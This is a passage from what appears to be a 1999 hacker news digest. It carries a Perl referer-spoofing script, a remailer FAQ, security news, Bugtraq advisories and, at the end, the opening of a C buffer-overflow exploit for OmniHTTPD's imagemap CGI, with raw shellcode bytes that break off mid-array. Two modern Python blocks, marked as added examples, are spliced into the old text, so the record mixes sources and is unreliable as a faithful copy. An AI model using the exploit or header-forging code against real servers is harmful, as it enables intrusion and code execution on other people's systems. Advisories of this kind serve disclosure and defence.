      $res = 0;      
      $handle = IO::Socket::INET->new(Proto => "tcp",      
         PeerAddr => $host,      
         PeerPort => 80) or $res = 1;      
      if($res eq 0) {      
       $handle->autoflush(1);      
       print STDERR "\[Connected to $host\]\n";      
       print $handle "GET $dir HTTP/1.0\n";      
       print $handle "Referer: $referer\n";      
       print $handle "Connection: Close\n";      
       print $handle "User-Agent: Mozilla\/4.5 [en] \(Win95\; I\)\n";      
       print $handle "Host: $host\n";        
       print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n";      
       print $handle "Accept-Encoding: gzip\n";      
       print $handle "Accept-Language: en\n";      
       print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n";      
       while($temp ne "") { # read some headers      
        $temp = <$handle>;      
        chop($temp);chop($temp);      
        @sort = split(/:/,$temp);      
        if($sort[0] =~ /server/i)  { print STDERR " \[$temp\]\n"; }      
        if($sort[0] =~ /date/i)    { print STDERR " \[$temp\]\n"; }      
        if($sort[0] =~ /content/i) { print STDERR " \[$temp\]\n"; }      
        }      
        
       print STDERR "\[Receiving data\]\n";       
       binmode(STDOUT);
      
       while(<$handle>) {      
        print "$_";      
        }
      
       close($handle);      
       print STDERR "\[Connection Closed\]\n";      
       } else { print STDERR "\[Could not connect to $host\]\n"; }
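
      What the script above means for whoever runs the server, as an added
      example (not part of webspf.pl or the original page): every byte of the
      Referer header is chosen by the client, so a referer check is not an
      access control, while a link signed by the server is. The host name,
      key, paths and function names are constructed for the illustration.

```python
# Added example: a Referer-based gate next to an HMAC-signed, expiring link.
import hashlib
import hmac

SECRET_KEY = b"constructed-demo-key"   # assumption: a per-site secret kept server-side
PROTECTED_HOST = "www.example.org"     # constructed host name


def build_request(target, referer=None):
    """Constructed HTTP/1.0 request in the shape webspf.pl emits (bare \\n endings)."""
    lines = [f"GET {target} HTTP/1.0"]
    if referer is not None:
        lines.append(f"Referer: {referer}")
    lines += ["Connection: Close", f"Host: {PROTECTED_HOST}", "", ""]
    return "\n".join(lines)


def parse_request(raw):
    """Return (target, headers) with header names lower-cased."""
    lines = raw.replace("\r\n", "\n").split("\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers


def referer_gate(raw):
    """Weak control: allow when the Referer names our own host."""
    _target, headers = parse_request(raw)
    return PROTECTED_HOST in headers.get("referer", "")


def sign_path(path, expires):
    """HMAC-SHA256 over the path and its expiry time (seconds)."""
    message = f"{path}\n{expires}".encode("utf-8")
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()


def make_link(path, expires):
    """Link the server hands out on its own pages; only it can compute sig."""
    return f"{path}?expires={expires}&sig={sign_path(path, expires)}"


def token_gate(raw, now):
    """Stronger control: allow only an unexpired link carrying a valid signature."""
    target, _headers = parse_request(raw)
    path, _, query = target.partition("?")
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    try:
        expires = int(params.get("expires", ""))
    except ValueError:
        return False
    if now > expires:
        return False
    supplied = params.get("sig", "").encode("utf-8")
    expected = sign_path(path, expires).encode("utf-8")
    return hmac.compare_digest(supplied, expected)   # constant-time comparison


if __name__ == "__main__":
    made_up = build_request("/images/logo.gif",
                            referer="www.example.org/images/index.html")
    signed = build_request(make_link("/images/logo.gif", expires=2000))
    print("referer gate, client-chosen Referer:", referer_gate(made_up))
    print("token gate,   client-chosen Referer:", token_gate(made_up, now=1000))
    print("token gate,   signed link:          ", token_gate(signed, now=1000))
    print("token gate,   signed link, expired: ", token_gate(signed, now=3000))
```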
       
       @HWA
       
53.0  MACMILLAN USA MOVES TO SECURE LINUX
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNS http://www.net-security.org/
      
      
      by Thejian, Saturday 23rd October 1999 on 1:25 pm CET
      MacMillan Publishing USA has entered into a strategic alliance with
      SecurityPortal.com to bring online security technologies to users of the Linux
      operating system (OS). The new product, Maximum Security Linux, will be
      jointly-released to provide administrators who run Linux with security-related
      capabilities such as intrusion detection, system auditing and monitoring along with
      virus protection. The package suite will bundle a wide range of security software made
      available through the GNU General Public License (GPL), and will provide access to
      "best practices" FAQs, policy guides and various security tips. 
      
      http://www.ecommercetimes.com/news/articles/991022-7.shtml
      
      MacMillan USA Moves To Secure Linux 
      By Matthew W. Beale 
      E-Commerce Times
      October 22, 1999 
     
      MacMillan Publishing USA has entered into a strategic alliance with 
      SecurityPortal.com to bring online security technologies to users of 
      the Linux operating system (OS). 

      The new product, Maximum Security Linux, will be jointly-released to 
      provide administrators who run Linux with security-related 
      capabilities such as intrusion detection, system auditing and 
      monitoring along with virus protection. 

      The package suite will bundle a wide range of security software made 
      available through the GNU General Public License (GPL), and will provide 
      access to "best practices" FAQs, policy guides and various security 
      tips. 

      "MacMillan's retail distribution and SecurityPortal's security knowledge 
      makes for a great partnership," commented Steve Schafer, Sr., title 
      manager for Macmillan's Linux software. "Getting this knowledge and 
      these tools into the hands of the Linux user is essential to help ensure 
      the security of the many personal and corporate Linux systems being 
      installed every day." 

      Rising Security Threats 

      Jim Reavis, SecurityPortal.com Webmaster, designed the product in response 
      to "the ever increasing size and complexity of networked software, 
      combined with the sophistication of today's hackers." He added that 
      Internet professionals need to more seriously consider securing their 
      operations, pointing out that "we are more exposed to security threats 
      than at any other time." 

      There are some 12 million Linux users worldwide, according to 
      International Data Corp. (IDC). Those numbers alone, say industry 
      analysts, should serve as incentive for companies to move into the 
      relatively quiet Linux security solutions market. 

      Maximum Secure Linux works with systems running the Linux kernel version 
      2.2.5 or higher. Internet security information provider SecurityPortal.com 
      also offers "technotes" and opinion pieces from IT security experts, 
      security-related news and links to security alerts, tools and other 
      resources. 

      The third largest operating system provider after Microsoft and Apple, 
      MacMillan offers The Complete Linux OS, a Linux distribution by 
      MandrakeSoft that is based on Red Hat. Establishing an early 
      strategic relationship with Red Hat, Inc., MacMillan has been involved 
      with the Linux community for almost four years.

      E-Commerce Security 

      Linux is increasingly being deployed by e-commerce operations, and IDC 
      numbers show that the open-source environment captured more than 17 
      percent of all server shipments last year. Security concerns among 
      e-commerce professionals, including those working with Linux-based 
      systems, are sometimes justified. 

      A study conducted by Information Security Magazine earlier this year 
      indicated that e-commerce operations are 57 percent more likely to 
      experience a security breach than other online sites. Additionally, 
      e-commerce sites are 24 percent more likely to be the target of a 
      hacker/cracker attack.  
      
      @HWA
      
54.0 ANONYMOUS REMAILERS
     ~~~~~~~~~~~~~~~~~~~
     
     From HNS http://www.net-security.org/
     
     by BHZ, Saturday 23rd October 1999 on 2:56 am CET
     "A remailer is computer service that privatizes your e-mail. This is in sharp contrast to
     most Internet Service Providers and corporate e-mail providers, which are terribly non
     private." Interested in them? Read Remailer FAQ. 
     
     http://www.andrebacard.com/remail.html
     
                         Anonymous Remailer FAQ

                                  by 
                         André Bacard, Author of 
     Computer Privacy Handbook ("The Scariest Computer Book of the Year")
                       [Updated 1 September 1999] 

                  [This article offers a nontechnical overview of "remailers" to 
                  help you decide whether to use these computer services. Links 
                  at <http://www.andrebacard.com/privacy.html> will connect you 
                  with specific remailers. I have written this especially for 
                  persons with a sense of humor. You may distribute this 
                  (unaltered) FAQ for non-commercial purposes. Copyright 1999 by 
                  André Bacard]. 

      What is a remailer? 

      A remailer is a computer service that privatizes your e-mail. This is in 
      sharp contrast to most Internet Service Providers and corporate e-mail 
      providers, which are terribly unprivate. 

      Traditionally, a remailer allowed you to send electronic mail to a Usenet 
      news group or to a person without the recipient knowing your true name or 
      your e-mail address. Today, a new variety of web-based remailers permits 
      you to send mail using your real name (if you wish), while 
      protecting your email records from the snooping eyes of your Internet 
      Service Provider. 

      In the first version of this FAQ (published in 1995), all popular 
      remailers were free-of-charge. Today, a number of services either charge 
      user fees, or support themselves via advertisers. 

      Why would YOU use remailers? 

      Maybe you're a computer engineer who wants to express opinions about 
      computer products, opinions that your employer might hold against you. 
      Possibly you live in a community that is violently intolerant of your 
      social, political, or religious views. Perhaps you're seeking 
      employment via the Internet and you don't want to jeopardize your present 
      job. Possibly you want to place personal ads. Perchance you're a 
      whistle-blower afraid of retaliation. Conceivably you feel that, if you 
      criticize your government, Big Brother will monitor you. Maybe you don't 
      want people "spamming" or "flaming" your corporate e-mail address. In 
      short, there are many legitimate reasons why you, a law abiding person, 
      might use remailers. 

      How does a remailer work? 

      Let's take an imaginary example. Suppose that a battered woman, Susan, 
      wants to post a message crying out for help. How can Susan post her 
      message and receive responses confidentially? She might use a 
      "pseudo-anonymous" remailer run by Andre Bacard called the 
      "Bacard.com" remailer. (This remailer is fictitious!) If she wrote to me, 
      my "bacard.com" computer would STRIP AWAY Susan's real name and address 
      (the header at the top of Susan's e-mail), replace this data with a dummy 
      address (for example, <an123@bacard.com>) and forward Susan's message to 
      the newsgroup or person of Susan's choice. Also, my computer would 
      automatically notify Susan that her message had been forwarded under her 
      new identity <an123@bacard.com>. Suppose that Debbie responds to Susan. My 
      computer will STRIP AWAY Debbie's real name and address, give Debbie a new 
      identity, and forward the message to Susan. This process protects 
      everyone's privacy. This process is tedious for a person but easy for a 
      computer. 
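
      The Susan and Debbie exchange described above, as an added example (not
      part of the FAQ and not any real remailer's code): the relay keeps a
      two-way table of real address and dummy address, rebuilds each message
      from scratch so none of the original headers survive, and notifies a
      first-time sender of the new identity. The addresses other than
      an123@bacard.com, the admin@ notice sender and all names are constructed.

```python
# Added example: the header-stripping and alias table of a pseudo-anonymous remailer.
from email.message import EmailMessage
from email.utils import parseaddr

REMAILER_DOMAIN = "bacard.com"   # the FAQ's fictitious remailer


class PseudonymousRemailer:
    def __init__(self, first_id=123):
        self._next_id = first_id
        self._alias_of = {}   # real address -> dummy address
        self._real_of = {}    # dummy address -> real address

    def _alias_for(self, real):
        """Return (alias, is_new); the same person always gets the same alias."""
        if real in self._alias_of:
            return self._alias_of[real], False
        alias = f"an{self._next_id}@{REMAILER_DOMAIN}"
        self._next_id += 1
        self._alias_of[real] = alias
        self._real_of[alias] = real
        return alias, True

    def relay(self, incoming):
        """Return the outgoing messages for one incoming message."""
        sender = parseaddr(incoming["From"])[1].lower()
        target = parseaddr(incoming["To"])[1].lower()
        alias, is_new = self._alias_for(sender)

        # Build a fresh message instead of deleting headers one by one, so
        # Received, X-Originating-IP and anything unforeseen are all dropped.
        # The body is copied unchanged: a signature typed into it still leaks.
        forwarded = EmailMessage()
        forwarded["From"] = alias
        # Mail addressed to a dummy address goes to the real person behind it.
        forwarded["To"] = self._real_of.get(target, target)
        forwarded["Subject"] = incoming.get("Subject", "")
        forwarded.set_content(incoming.get_content())
        outgoing = [forwarded]

        if is_new:
            notice = EmailMessage()
            notice["From"] = f"admin@{REMAILER_DOMAIN}"   # hypothetical address
            notice["To"] = sender
            notice["Subject"] = "Your message was forwarded"
            notice.set_content(f"Forwarded under your new identity {alias}.\n")
            outgoing.append(notice)
        return outgoing


def constructed_message(sender, to, subject, body):
    """Constructed sample mail carrying the kind of headers that identify a sender."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = to
    msg["Subject"] = subject
    msg["Received"] = "from dialup-17.isp.example by mail.isp.example"
    msg["X-Originating-IP"] = "192.0.2.17"
    msg.set_content(body)
    return msg


if __name__ == "__main__":
    remailer = PseudonymousRemailer()
    first = remailer.relay(constructed_message(
        "Susan <susan@home.example>", "debbie@work.example", "help", "Please write back.\n"))
    reply = remailer.relay(constructed_message(
        "Debbie <debbie@work.example>", "an123@bacard.com", "re: help", "I can help.\n"))
    for msg in first + reply:
        print(msg["From"], "->", msg["To"], "|", msg["Subject"])
```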

      Are there many remailers? 

      The good news... Yes, there are dozens of popular remailers. 

      The bad news... Remailers tend to come and go. First, they require 
      equipment and labor to set up and maintain. Second, a minority of 
      individuals who use remailers are a pain in the neck. These selfish 
      persons drive remailer operators into early retirement. Third, many 
      remailer owners tire of losing money. 

      I hope that we are entering an era of financially profitable remailers. 
      This profitability will permit better reliability and stability. 

      If you live and breathe computers, the best place to keep in touch with 
      the Art & Science of remailers is at the Usenet newsgroup 
      <alt.privacy.anon-server>. If you don't know the difference between a bite 
      and a bit, I recommend you simply study the remailers found at my 
      web site. 

      Why are some remailers free, while others charge fees? 

      In the beginning, all remailers were free to users (but not to the people 
      who ran them!). How could a remailer administrator charge people who 
      wanted maximum privacy? How could administrators ask for a credit card 
      number or take checks? Several years ago, there was no technical 
      solution to these problems. 

      In 1995, I wrote: "In the future, remailer operators might charge for 
      their services. Privacy is valuable. For example, offshore banking is one 
      of the world's biggest businesses. It is easy to imagine Remailer, ETC., a 
      cyberspace company that goes beyond Mailbox, ETC. (the existing 
      company which rents snail mail boxes). In order for remailers to 
      become commercial on a big scale, anonymous payment systems such as 
      DigiCash must become popular." 

      My predictions came true. Today, many remailer operators charge fees for 
      the same reason that you go to work in order to pay for food, housing, 
      etc. 

      Why do people operate remailers, if not for money? 

      Why does André Bacard spend hours writing FAQs? Why do some people 
      volunteer to help others? Some people set up remailers for their own 
      personal usage, which they may or may not care to share with the rest of 
      us. Some persons are educators or activists. Joshua Quittner, 
      co-author of the high-tech thriller Mother's Day, interviewed Mr. Julf 
      Helsingius for Wired magazine. Helsingius, who ran the world's most 
      popular remailer for three years until he retired on August 30, 1996, 
      said: 

      "It's important to be able to express certain views without everyone 
      knowing who you are. One of the best examples was the great debate about 
      Caller ID on phones. People were really upset that the person at the 
      receiving end would know who was calling. On things like telephones, 
      people take for granted the fact that they can be anonymous if they want 
      to and they get really upset if people take that away. I think the same 
      thing applies for e-mail. Living in Finland, I got a pretty close view of 
      how things were in the former Soviet Union. If you actually owned a 
      photocopier or even a typewriter there you would have to register it and 
      they would take samples of what your typewriter would put out so they 
      could identify it later. That's something I find so appalling. The fact 
      that you have to register every means of providing information to the 
      public sort of parallels it, like saying you have to sign everything on 
      the Net. We always have to be able to track you down". 

      What is the difference between a "pseudo-anonymous" and an "anonymous" 
      remailer? 

      Most people use the expression "anonymous remailer" as shorthand for both 
      types of remailers. This causes confusion! 

      A "PSEUDO anonymous" remailer is basically an account that you open with a 
      remailer operator. The fictitious Bacard.com (described above) is a 
      PSEUDO-anonymous remailer. This means that I, the operator, and my 
      assistants KNOW your real e-mail address. Your privacy is as good as 
      the remailer operator's power and integrity to protect your records. In 
      practice, what does this mean? Someone might get a court order to force a 
      PSEUDO anonymous remailer operator to reveal your true identity. The 
      Finnish police forced Julf Helsingius to reveal at least one person's true 
      identity. 

      The advantage of most PSEUDO-anonymous remailers is that they are 
      user-friendly. If you can send e-mail, you can probably understand PSEUDO 
      anonymous remailers. The price you pay for ease of use is less security. 

      Truly ANONYMOUS remailers are a different animal. The good news... They 
      provide much more privacy than PSEUDO anonymous remailers. The bad news... 
      They are much harder to use than their PSEUDO anonymous cousins. 

      There are basically two types of ANONYMOUS remailers. They are called 
      "Cypherpunk remailers" and Lance Cottrell's "Mixmaster remailers". Note 
      that I refer to remailers in the plural. If you want maximum privacy, you 
      should send your message through two or more remailers. If done 
      properly, you can ensure that NOBODY (no remailer operator or any snoop) 
      can read both your real name and your message. This is the real meaning of 
      ANONYMOUS. In practice, nobody can force an ANONYMOUS remailer operator to 
      reveal your identity, because the operator has NO CLUE who you are! 

      For 99% of the Internet public, the PSEUDO anonymous remailers at my web 
      site are more than adequate. 

      What are the newest trends in remailers?

      Web-based remailers are very popular. This trend was fueled, in part, by 
      Microsoft's and Yahoo!'s services. Web-based services enable you to check 
      your email via the Internet wherever you might be, for example at a public 
      library. For security purposes, a movement is catching on to move 
      remailers "offshore", in particular to the Caribbean. The United States 
      Congress (and its enforcers -- the NSA, CIA, FBI, IRS, etc.) is, by far, 
      the world's most aggressive opponent of privacy. For many reasons, privacy 
      can be increased by operating outside the United States. 

      What makes an "ideal" remailer? 

      An "ideal" remailer: (a) Is easy to use. (b) Is operated by reliable 
      persons. (c) Uses PGP or other high-level encryption. (d) Allows you to 
      read your email without forwarding it to your Internet Service Provider. 
      (e) Is owned and operated outside the United States. (f) Allows 
      security experts and computer enthusiasts to examine its computer source 
      code. 

      Many top-rate remailers do NOT satisfy all these requirements. However, 
      these remailers are far superior to your ordinary Internet Service 
      Provider. So please don't make yourself crazy looking for the "perfect" 
      solution. Life is not perfect. 

      If a remailer does NOT permit PGP (Pretty Good Privacy) or other strong 
      encryption, reasonable people might assume that the remailer administrator 
      enjoys reading forwarded mail. 

      What makes a responsible remailer user? 

      A responsible user: (a) Sends text files of a reasonable length. Binary 
      photo files of Pam Anderson, or the Babe-of-the-Month, can take too much 
      transmission time. (b) Transmits files selectively. Remailers are NOT 
      designed to send "You Can Get Rich" chain letters or other junk 
      mail. 

      Who are irresponsible remailer users? 

      Here is a quote from one remailer administrator: "This remailer has been 
      abused in the past, mostly by users hiding behind anonymity to harass 
      other users. I will take steps to squish users who do this. Let's keep the 
      net a friendly and productive place.... Using this remailer to send 
      death threats is highly obnoxious. I will reveal your return address to 
      the police if you do this." 

      Legitimate remailer administrators will NOT TOLERATE serious harassment or 
      criminal activity. Report any such incidents to the remailer 
      administrator. 

      Having said that, I must report that I receive e-mail such as this: 
      "Someone is using a FU..ING remailer to call me a hateful person. I want 
      to get my FU..ING hands on that FU..ING (obscenities deleted) person and 
      kill him for spreading the vicious lie that I have a bad temper. Why 
      won't the FU..ING jerk who runs the remailer help innocent victims like 
      me?" 

      As I implied earlier, it is not easy to run a remailer! 

      How safe are remailers? [for paranoids only :-)] 

      For most low-security tasks, such as responding to personal ads, PSEUDO 
      anonymous remailers with passcode protection are undoubtedly safer than 
      using real e-mail addresses. However, all the best made plans of mice and 
      men have weaknesses. Suppose, for example, that you are a government 
      employee, who just discovered that your boss is taking bribes. Is it safe 
      to use a PSEUDO anonymous remailer to send evidence to a government 
      whistleblower's e-mail hot line? Here are a few points to ponder: 

      (a) The person who runs your e-mail system might intercept your secret 
      messages to and from the remailer. This gives him proof that YOU are 
      reporting your corrupt boss. This evidence could put you in danger. 

      (b) Maybe the remailer is a government sting operation or a criminal 
      enterprise designed to entrap people. The person who runs this service 
      might be your corrupt boss' partner. 

      Warning: I have seen a few remailers that strike me as suspicious. For 
      legal reasons, I cannot name these services. You must decide for yourself 
      who to trust. 

      (c) Hackers can do magic with computers. It's possible that civilian or 
      Big Brother hackers have broken into the remailer (unbeknownst to the 
      remailer's administrator), and that they can read your messages at will. 

      (d) It is possible that Big Brother collects, scans, and stores all 
      messages, including passcodes, into and out of the remailer. 

      (e) If you use a United States based remailer, a U.S. judge could subpoena 
      the remailer's records. 

      For these reasons, hard-core privacy people are leery of PSEUDO anonymous 
      remailers. These people use Cypherpunk or Mixmaster programs that route 
      their messages through several ANONYMOUS remailers. In addition, they use 
      PGP encryption software for all messages. 

      (For a good anonymous remailer try out www.replay.com ... - Ed)
     
     @HWA
     
55.0  PROJECT GAMMA STILL DOWN
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ, Saturday 23rd October 1999 on 2:12 am CET
      Project Gamma is still down, but WHiTe VaMPiRe tells all of its visitors: "The DNS
      will be down for another week. Probably the soonest pG will be back up now is on the
      25th. ;\ We are doing everything that is humanly possible to bring it back, as quickly
      as possible" 
      
      @HWA
      
56.0  PRIVATE DESKTOP
      ~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ, Saturday 23rd October 1999 on 2:24 am CET
      ConSeal Private Desktop is a personal firewall that puts you in full control of your
      PC's connection to the Internet! Designed for the non-technical user, this privacy
      management tool stops all known attacks including Back Orifice, denial of service
      and cyber stalkers.
      
      http://www.signal9.com/products/desktop/index.html
      
      @HWA
      
57.0  Y2K RELATED DISASTER
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ, Saturday 23rd October 1999 on 1:04 am CET
      Chicago Tribune wrote about an ecological disaster with roots in Y2K solving - Trying
      a dose of preventive medicine, Alexian Brothers Medical Center in Elk Grove Village
      prepared for a possible Y2K power outage by pumping up the diesel fuel tanks that
      power the hospital's electrical generators. But the hospital's good intentions backfired
      earlier this month when the tanks received more fuel than they could hold. The
      overflow--2,000 gallons--seeped through an underground drain tile, through a series of
      storm sewers and, finally, into a retention pond surrounded by luxury homes.
      
      @HWA
      
58.0  ANTI-MS SOFTWARE
      ~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ, Saturday 23rd October 1999 on 1:04 am CET
      Revenge of Mozilla is the first utility to completely remove Internet Explorer from
      Windows 98. The first version of Revenge of Mozilla was a companion for 98Lite,
      finishing the job that 98Lite left behind. It was created due to a strong demand for an
      application that would 1) Remove IE in its entirety, 2) Do it *all* in one shot, 3) Not
      require fussing with a DOS-based application prior to installing Windows98, and 4) Be
      completely free of charge for the web community to enjoy. 
      
      http://www.silverlink.net/~jensenba/rom2/
      
      @HWA
      
59.0  HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Friday 22nd October 1999 on 8:20 pm CET
      Within the last couple weeks, Microsoft has unveiled their new Passport service
      which allows you to log in to multiple sites and do your work with one single login.
      However, they failed to realize that not all people allow all cookies everywhere to be
      put on their computer. It is possible by making a settings change in Netscape (and
      possibly IE) to transparently let a user log in as the last user that used Hotmail on
      that computer. Microsoft is investigating the problem but noted that it's a problem
      within the Passport sign-out service and added that the Passport wallet service is not
      vulnerable. 
      
60.0  Books: Hacking Exposed: Network Security Secrets and Solutions 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.securityfocus.com/

      Hacking Exposed: Network Security Secrets and Solutions 
      by George Kurtz, Stuart McClure and Joel Scambray 
      <Osborne/McGraw-Hill>
      Type: book   ISBN: 0072121270   Year: 1999                                                                                                                                    
      
      
        Defend your network against the sneakiest hacks and latest attacks. In 
        this must-have handbook, security experts Stuart McClure, Joel Scambray, 
        and George Kurtz give you the full scoop on some of the most highly 
        publicized and insidious break-ins and show you how to implement 
        bulletproof security on your system. All aspects of network security are 
        included from informational scans and probes to password 
        vulnerabilities, dialup networking insecurities, buffer overflows, Web 
        and email insecurities, trojans, and back doors. Hacking Exposed: 
        Network Security Secrets and Solutions covers all security, auditing, 
        and intrusion detection procedures for UNIX (including Linux), Windows 
        NT/95/98, and Novell networks. 

        The bonus companion web site (www.hackingexposed.com) contains custom 
        scanning scripts and links to security tools.

        Foreword by industry expert Marcus Ranum, CEO of Network Flight Recorder 
        (NFR).

        Here's what security experts are saying about "Hacking Exposed". 

        "Understanding how to mount and create attacks is the only way you can 
        protect against existing and, more importantly, future attacks. The 
        information contained herein arms those on the defensive (security 
        admin, network architects, software developers, etc) with this 
        knowledge. It is refreshing to see this sort of material finally being 
        made available to the general public." - Dr. Mudge of Lopht security 
        research group, developers of the Lophtcrack NT password auditing tool 

        "My experience in securing systems is that most users are shocked when 
        they find out how vulnerable they really are. Perhaps this book will 
        shock you. No matter what, it will educate you." - Marcus Ranum, 
        CEO of Network Flight Recorder 

        "The authors have put together an excellent up-to-date resource on 
        modern security vulnerabilities. Rather than simply documenting a few 
        case studies and talking about problems on a macro scale, the authors 
        build up a robust framework and dissect the security issues 
        completely. Each vulnerability covered has detailed countermeasure 
        information. More than a how-to manual, it's a how-to-do-it-right 
        manual. A book like this has been needed for quite some time now." - 
        Mike D. Schiffman ("Route"), Security Researcher and Author of the 
        Firewalk tool 

        "Hacking Exposed is a gut wrenching look at the security techniques used 
        in computer penetration. The authors provide an up to date and 
        comprehensive view of the methods that hackers use to compromise your 
        networks. If this book doesn't scare and motivate you to take security 
        seriously, nothing will." - Aleph One, Moderator of the Bugtraq Security 
        Mailing List 

        "This book is destined to be a classic. Unlike most other security 
        books, this explains details on hacker tools - why they are used, how 
        they work, and how best to protect yourself from them. The underground 
        already knows this stuff, and this book helps the sys admin see 
        their systems through the intruder's eyes." - Simple Nomad, Renowned 
        Security Researcher and Author of The Hack FAQ 

        Learn to:

        - Find, exploit, and apply countermeasures for security holes in Unix, 
          Linux, Windows NT/95/98, and Novell networks 
        - Repair email and Web security holes (CGI, Perl, ASP, browsers, and 
          hostile mobile code) 
        - Understand how back channels and port redirection are used to 
          circumvent firewalls 
        - Locate and scan for vulnerable systems using Whois, Domain Name 
          System queries, Ping Sweeps, Port Scans, and OS detection 
        - Enumerate users, groups, shares, file systems, and services with no 
          authentication 
        - Crack accounts and passwords, escalate privilege, and exploit trusts 
        - Find and eliminate back doors, Trojan horses, viruses, and buffer 
          overflows 
        - Implement auditing and intrusion detection solutions 
        - Recognize vulnerabilities from dialup modems, modem pools, and RAS 
          servers 
        
        @HWA
        

61.0  Microsoft Java Virtual Machine Class Cast Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.securityfocus.com/
      
      bugtraq id   740
      class        Failure to Handle Exceptional Conditions
      cve          GENERIC-MAP-NOMATCH
      remote       Yes
      local        Yes
      published    October 22, 1999
      updated      October 22, 1999
      
      vulnerable
              Microsoft Virtual Machine 3000.0 Series
                 + Microsoft Internet Explorer 5.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 + Microsoft Internet Explorer 5.0 for Windows 98
                    + Microsoft Windows 98
                 + Microsoft Internet Explorer 5.0 for Windows 95
                    + Microsoft Windows 95
                 + Microsoft Internet Explorer 5.0 for Windows 2000
                    - Microsoft Windows NT 2000.0
              Microsoft Virtual Machine 2000.0 Series
                 + Microsoft Internet Explorer 4.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 + Microsoft Internet Explorer 4.0 for Windows NT 3.51
                    - Microsoft Windows NT 3.5.1
                 + Microsoft Internet Explorer 4.0 for Windows 98
                    + Microsoft Windows 98
                 + Microsoft Internet Explorer 4.0 for Windows 95
                    + Microsoft Windows 95
       not vulnerable
              Microsoft Virtual Machine 3188.0.0 and up
                 - Microsoft Internet Explorer 5.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 - Microsoft Internet Explorer 5.0 for Windows 98
                    + Microsoft Windows 98
                 - Microsoft Internet Explorer 5.0 for Windows 95
                    + Microsoft Windows 95
                 - Microsoft Internet Explorer 5.0 for Windows 2000
                    - Microsoft Windows NT 2000.0
                 - Microsoft Internet Explorer 4.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 - Microsoft Internet Explorer 4.0 for Windows NT 3.51
                    - Microsoft Windows NT 3.5.1
                 - Microsoft Internet Explorer 4.0 for Windows 98
                    + Microsoft Windows 98
                 - Microsoft Internet Explorer 4.0 for Windows 95
                    + Microsoft Windows 95        
                    
       The Virtual Machine is a component of various programs and operating
      systems that handles the execution of Java code. All Microsoft VMs with
      build numbers between 2000 and 3187 inclusive have been found to
      contain a weakness whereby a Java applet could take any action on the
      local machine that the user could take. This is possible because the MS
      VM allows 'cast', or conversion, operations to be done on classes, which
      creates the opportunity for a 'public' class to be converted to 'private',
      thereby increasing the privileges of the code within that class. This
      action could not be coded in a regular Java compiler, but the Java binary
      could be edited specifically to cause the cast operation.
      
      Microsoft has released a new build that is not subject to this
      vulnerability, available at:
      http://www.microsoft.com/java/vm/dl_vm32.htm
      
      credit
      Publicized in Microsoft Security Bulletin MS99-045,
      released on Oct 21, 1999.

      reference
      advisory:
               MS99-045: Patch Available "Virtual Machine
               Verifier" Vulnerability
               (MS)
      web page:
               Microsoft Security Bulletin (MS99-045):
               Frequently Asked Questions
               (Microsoft)
      web page:
               Microsoft Virtual Machine
               (Microsoft)

      
      @HWA
      
      
62.0  OmniHTTPD Buffer Overflow Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id 739
      class      Boundary Condition Error
      cve        GENERIC-MAP-NOMATCH
      remote     Yes
      local      No
      published  October 22, 1999
      updated    October 22, 1999
      
      vulnerable
      
              Omnicron OmniHTTPD 2.4Pro
              Omnicron OmniHTTPD 1.1      
              
      There is a remotely exploitable buffer overflow vulnerability in the CGI
      program "imagemap", which is distributed with Omnicron's OmniHTTPD.
      During operations made on arguments passed to the program, a lack of
      bounds checking on a strcpy() call can allow for arbitrary code to be
      executed on the machine running the server.        
      
      /*=============================================================================
         Imagemap 1.00.00 CGI Exploit (Distributed with OmniHTTPd 1.01 and Pro2.04)
         The Shadow Penguin Security (http://shadowpenguin.backsection.net)
         Written by UNYUN (shadowpenguin@backsection.net)
        =============================================================================
      */
      #include    <stdio.h>
      #include    <string.h>
      #include    <windows.h> 
      #include    <winsock.h>
      
      #define     MAXBUF          2000
      #define     RETADR          348
      #define     JMPADR          344
      #define     HTTP_PORT       80
      
      unsigned int mems[]={
      0xBFB50000, 0xBFB72FFF,  0xBFDE0000, 0xBFDE5FFF,
      0xBFE00000, 0xBFE0FFFF,  0xBFE30000, 0xBFE42FFF,
      0xBFE80000, 0xBFE85FFF,  0xBFE90000, 0xBFE95FFF,
      0xBFEA0000, 0xBFF1EFFF,  0xBFF20000, 0xBFF46FFF,
      0xBFF50000, 0xBFF60FFF,  0xBFF70000, 0xBFFC5FFF,
      0xBFFC9000, 0xBFFE2FFF,
      0,0};
      
      unsigned char exploit_code[200]={
      0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
      0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
      0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
      0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
